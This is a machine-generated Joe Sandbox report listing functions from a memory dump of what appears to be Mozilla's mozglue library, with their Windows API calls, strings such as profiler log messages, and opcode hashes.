Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: ddb369ad4499c13b9e2a0c0286b5cd2a6d55ee7962b991f28a067a797dc05115
Instruction ID: bd58e728a741321d4f011569b76f05b3a6981f306e70663fb8dcf99c49a55cbd
Opcode Fuzzy Hash: ddb369ad4499c13b9e2a0c0286b5cd2a6d55ee7962b991f28a067a797dc05115
Instruction Fuzzy Hash: B1B191B0E042099BDB04DF99E892BAEFFB6AFC5308F104129D515AB780D771AD51CBE1

Function 665FC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 665FC5A3
WideCharToMultiByte.KERNEL32 ref: 665FC9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 665FC9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 665FCA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 665FCA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 665FCAA5

Strings

(null), xrefs: 665FC596
0, xrefs: 665FD30A

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 68b0ff59bfb791458bb005cc75a642529fb52d88ae1165ab6e7016ffd50c452f
Instruction ID: 9e0fcd2f3c81f1eb1c324f399ae56fbf5ede3b43feacfcb538efbe0596bc0dd4
Opcode Fuzzy Hash: 68b0ff59bfb791458bb005cc75a642529fb52d88ae1165ab6e7016ffd50c452f
Instruction Fuzzy Hash: AAA17D306183529FDB01CF28D995B5BBBE2AFC9744F04892DE98A97341D731E806CF92

Function 665D48E0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 198COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,6661483A,?), ref: 665D4ACB
memcpy.VCRUNTIME140(-00000023,?,?,?,?,6661483A,?), ref: 665D4AE0
moz_xmalloc.MOZGLUE(?,?,6661483A,?), ref: 665D4A82

Part of subcall function 665ECA10: mozalloc_abort.MOZGLUE(?), ref: 665ECAA2

memcpy.VCRUNTIME140(-00000023,?,?,?,?,6661483A,?), ref: 665D4A97
moz_xmalloc.MOZGLUE(?,?,6661483A,?), ref: 665D4A35

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

memcpy.VCRUNTIME140(-00000023,?,?,?,?,6661483A,?), ref: 665D4A4A
moz_xmalloc.MOZGLUE(?,?,6661483A,?), ref: 665D4AF4
moz_xmalloc.MOZGLUE(?,?,6661483A,?), ref: 665D4B10
moz_xmalloc.MOZGLUE(?,?,6661483A,?), ref: 665D4B2C

Strings

:Haf, xrefs: 665D48EB, 665D49FB

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
String ID: :Haf
API String ID: 4251373892-409765162
Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction ID: 28bda131d07d199919390b57c84385202d35388a64d31f1e6df167494bfe2d58
Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction Fuzzy Hash: 63718EB19007069FDB14CF68C5819AABBF5FF19308B504A3DD15ACB781E731E955CB84

Function 665FC769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON

Download Yara Rule

APIs

islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 665FC784
_dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 665FC801
_dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 665FC83D
?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 665FC891

Strings

inf, xrefs: 665FC78F
INF, xrefs: 665FC794
NAN, xrefs: 665FC7AD
nan, xrefs: 665FC7A8

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
String ID: INF$NAN$inf$nan
API String ID: 1991403756-4166689840
Opcode ID: a127ae92292477b3314b58ae77c7415dda4060c891601773473affb9bff1886c
Instruction ID: a01f2ba2a61bdc0ab568887e9f988ef987788430ca41408100959e9cb066b300
Opcode Fuzzy Hash: a127ae92292477b3314b58ae77c7415dda4060c891601773473affb9bff1886c
Instruction Fuzzy Hash: 185159709187408BDB00DF2CD58269BBBF1BF9A305F008A2DE9D5A7250E771D9868F82

Function 665D3480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,665D3284,?,?,665F56F6), ref: 665D3492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,665D3284,?,?,665F56F6), ref: 665D34A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,665D3284,?,?,665F56F6), ref: 665D34EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 665D350E
__Init_thread_footer.LIBCMT ref: 665D3522
__aulldiv.LIBCMT ref: 665D3552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,665D3284,?,?,665F56F6), ref: 665D357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,665D3284,?,?,665F56F6), ref: 665D3592

Part of subcall function 6660AB89: EnterCriticalSection.KERNEL32(6665E370,?,?,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284), ref: 6660AB94
Part of subcall function 6660AB89: LeaveCriticalSection.KERNEL32(6665E370,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284,?,?,665F56F6), ref: 6660ABD1

Strings

kernel32.dll, xrefs: 665D34EA
GetSystemTimePreciseAsFileTime, xrefs: 665D3508

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: f8a0936b82f980cae3482284494e6feaf15ce0c74143abb1e85007e4690a6f19
Instruction ID: dcd7b81af56b936b5b3b8740879872bd4cc8a502029d4537d4d113794222695f
Opcode Fuzzy Hash: f8a0936b82f980cae3482284494e6feaf15ce0c74143abb1e85007e4690a6f19
Instruction Fuzzy Hash: 4D318471D002559BDF04DFBBE95AA6A77B7FBC6340F144029E605A3290DB70AD00CF65

Function 6661EB90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 66threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,665E4A68), ref: 6661945E
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 66619470
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 66619482
Part of subcall function 66619420: __Init_thread_footer.LIBCMT ref: 6661949F

GetCurrentThreadId.KERNEL32 ref: 6661EBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6661EBAC

Part of subcall function 666194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 666194EE
Part of subcall function 666194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 66619508

GetCurrentThreadId.KERNEL32 ref: 6661EBC1
AcquireSRWLockExclusive.KERNEL32(6665F4B8,?,?,00000000), ref: 6661EBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6661EBE5
ReleaseSRWLockExclusive.KERNEL32(6665F4B8,00000000), ref: 6661EC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6661EC46
CloseHandle.KERNEL32(?), ref: 6661EC55
free.MOZGLUE(00000000), ref: 6661EC5C

Strings

[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6661EA9B
[I %d/%d] profiler_start, xrefs: 6661EBB4

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectReleaseSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 4250961200-1186885292
Opcode ID: b39e66723090a570f6db9b78f30bdae51b9ac8be2583ba8133b2dc09958dd15e
Instruction ID: a293c585fe21c84fa47a579230f0f4b5eb3fda5694475e3aed9fa898a85efac6
Opcode Fuzzy Hash: b39e66723090a570f6db9b78f30bdae51b9ac8be2583ba8133b2dc09958dd15e
Instruction Fuzzy Hash: 9611D2759042649BCF019F69FC0AA5ABF67EFC5369F044220FE2997241D731D811CBA1

Function 665D4480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,66614843,?), ref: 665D45F5
free.MOZGLUE(?,?,?,?,?,?,?,?,66614843,?), ref: 665D468A
free.MOZGLUE(?,?,?,?,?,?,66614843,?), ref: 665D46C9
free.MOZGLUE(?), ref: 665D46EF
free.MOZGLUE(?), ref: 665D4712
free.MOZGLUE(?), ref: 665D4735
free.MOZGLUE(?), ref: 665D4758
free.MOZGLUE(?), ref: 665D477B
free.MOZGLUE(?), ref: 665D479E

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: 506793dedb5ea6750b099c0548adc6179f0f1ccb2df161d7707e37b75c1bfa49
Instruction ID: 9e5fc71cb6019512adc45983d7527e7b7f34d4a042c09e14207418b3522a6735
Opcode Fuzzy Hash: 506793dedb5ea6750b099c0548adc6179f0f1ccb2df161d7707e37b75c1bfa49
Instruction Fuzzy Hash: C8B1DF72A001518FDB18CF3CDCA276D7AA2AF92324F144A69E816DB7D6D731D840CB89

Function 6663AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6663AC52
CreateFileMappingW.KERNEL32 ref: 6663AC7D
GetSystemInfo.KERNEL32 ref: 6663AC98
MapViewOfFile.KERNEL32 ref: 6663ACB0
GetSystemInfo.KERNEL32 ref: 6663ACCD
MapViewOfFile.KERNEL32 ref: 6663AD05
UnmapViewOfFile.KERNEL32 ref: 6663AD1C
CloseHandle.KERNEL32 ref: 6663AD28
UnmapViewOfFile.KERNEL32 ref: 6663AD37
CloseHandle.KERNEL32 ref: 6663AD43
CloseHandle.KERNEL32 ref: 6663AD67

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 7611ce2e91c4c72c250ed1f08c4b21770319222e7cb013dd273008eae3b1f993
Instruction ID: 4d3f6a5dc98698c27f4749013c674916099019a779536a6e02100219feac756e
Opcode Fuzzy Hash: 7611ce2e91c4c72c250ed1f08c4b21770319222e7cb013dd273008eae3b1f993
Instruction Fuzzy Hash: 32316FB19047558FDB00EF79E64926EBBF2BF85301F058A2DEA8597211EF709458CB82

Function 6660F2B0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6660D9DB), ref: 6660F2D2
GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6660F2F5
moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6660F386
moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6660F347

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6660F3C8
free.MOZGLUE(00000000,00000000), ref: 6660F3F3
free.MOZGLUE(00000000,00000000), ref: 6660F3FC
free.MOZGLUE(00000000,?,?,00000000), ref: 6660F413

Strings

ntdll.dll, xrefs: 6660F2F0

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: freemoz_xmalloc$HandleModule$malloc
String ID: ntdll.dll
API String ID: 301460908-2227199552
Opcode ID: 68f2a14ba3c71fc57af71b045e8f482d09e40dd6959b812392cf03568f8a1da2
Instruction ID: 32bd215a15666901410958a6df93e7761bf430b5eb6ca79909741469d1f443c6
Opcode Fuzzy Hash: 68f2a14ba3c71fc57af71b045e8f482d09e40dd6959b812392cf03568f8a1da2
Instruction Fuzzy Hash: 7541E2B1E002159BDF0CCF25F94275A7BB6EFC9324F104429DA2A97381EB30A811CB86

Function 66636A10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6665F618), ref: 66636A68
GetCurrentProcess.KERNEL32 ref: 66636A7D
GetCurrentProcess.KERNEL32 ref: 66636AA1
EnterCriticalSection.KERNEL32(6665F618), ref: 66636AAE
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 66636AE1
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 66636B15
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 66636B65
LeaveCriticalSection.KERNEL32(6665F618,?,?), ref: 66636B83

Strings

SymInitialize, xrefs: 66636BA3

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
String ID: SymInitialize
API String ID: 3103739362-3981310019
Opcode ID: 828ea93f0ef91f8b69d69da33a87b6bef94bc3f75834b68dab0dd5eff82fb431
Instruction ID: 45524df0fcd4bc3164f8a4b75b85f63851f41759620e8247d242a52a0dcb926b
Opcode Fuzzy Hash: 828ea93f0ef91f8b69d69da33a87b6bef94bc3f75834b68dab0dd5eff82fb431
Instruction Fuzzy Hash: 6D4185715043949FDF01CF76E889B9A3BAAAB86304F044079FE49DF282DB719514CBA1

Function 665E9620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 665E9675
__Init_thread_footer.LIBCMT ref: 665E9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 665E96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 665E9707
__Init_thread_footer.LIBCMT ref: 665E971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 665E9773

Part of subcall function 6660AB89: EnterCriticalSection.KERNEL32(6665E370,?,?,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284), ref: 6660AB94
Part of subcall function 6660AB89: LeaveCriticalSection.KERNEL32(6665E370,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284,?,?,665F56F6), ref: 6660ABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 665E97B7
FreeLibrary.KERNEL32 ref: 665E97D0
FreeLibrary.KERNEL32 ref: 665E97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 665E9824

Strings

MapViewOfFileNuma2, xrefs: 665E97B1
NtMapViewOfSection, xrefs: 665E9701
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 665E9670
ntdll.dll, xrefs: 665E96E3

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: 681da0f3e44aef45e9ca840e376fc8e95f3d6c009203eb94ee22124ae71e0739
Instruction ID: 09e6eca9fc5aee25e6e6a846dae5b686848ed2d4afb597304196aaf8ab44c7b7
Opcode Fuzzy Hash: 681da0f3e44aef45e9ca840e376fc8e95f3d6c009203eb94ee22124ae71e0739
Instruction Fuzzy Hash: 2641BDB1A002169BDF00DF66F896E9A7BA7EBCA364F014029EE0597240D730F814CFA1

Function 6661DBB0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 207threadCOMMON

Download Yara Rule

APIs

Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,665E4A68), ref: 6661945E
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 66619470
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 66619482
Part of subcall function 66619420: __Init_thread_footer.LIBCMT ref: 6661949F

GetCurrentThreadId.KERNEL32 ref: 6661DBE1
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6661DBE9

Part of subcall function 666194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 666194EE
Part of subcall function 666194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 66619508

??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6661DC5D
moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6661DC7F

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

Part of subcall function 66619A60: GetCurrentThreadId.KERNEL32 ref: 66619A95
Part of subcall function 66619A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 66619A9D
Part of subcall function 66619A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 66619ACC
Part of subcall function 66619A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 66619BA7
Part of subcall function 66619A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 66619BB8
Part of subcall function 66619A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 66619BC9

Part of subcall function 6661E8B0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6661DCF5), ref: 6661E92D

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6661DD1B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6661DD44
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6661DD58

Part of subcall function 6660CBE8: GetCurrentProcess.KERNEL32(?,665D31A7), ref: 6660CBF1
Part of subcall function 6660CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,665D31A7), ref: 6660CBFA

Strings

[I %d/%d] locked_profiler_save_profile_to_file(%s), xrefs: 6661DBF2

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CurrentTimefreegetenv$ProcessStampThreadV01@@Value@mozilla@@_getpidmalloc$??1ios_base@std@@?profiler_time@baseprofiler@mozilla@@Init_thread_footerNow@Stamp@mozilla@@TerminateV12@___acrt_iob_func__stdio_common_vfprintfmoz_xmalloc
String ID: [I %d/%d] locked_profiler_save_profile_to_file(%s)
API String ID: 3378208378-1387374313
Opcode ID: 14c34cadbf4fc3217186f174fc65b3e49bde130e4aaf0ec9b768c8ed56d9458d
Instruction ID: 83c4c3754c21661535ab10cb1bb99f1d0cf70d577a5f6321dfe921acff845d06
Opcode Fuzzy Hash: 14c34cadbf4fc3217186f174fc65b3e49bde130e4aaf0ec9b768c8ed56d9458d
Instruction Fuzzy Hash: 4F819174A047008FCB14DF29E895A66FBE6EF89308B50892DD95787791DB30E909CF91

Function 66620000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON

Download Yara Rule

APIs

Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,665E4A68), ref: 6661945E
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 66619470
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 66619482
Part of subcall function 66619420: __Init_thread_footer.LIBCMT ref: 6661949F

GetCurrentThreadId.KERNEL32 ref: 66620039
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 66620041
GetCurrentThreadId.KERNEL32 ref: 66620075
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 66620082
moz_xmalloc.MOZGLUE(00000048), ref: 66620090
free.MOZGLUE(?), ref: 66620104
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6662011B

Strings

[D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6662005B

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
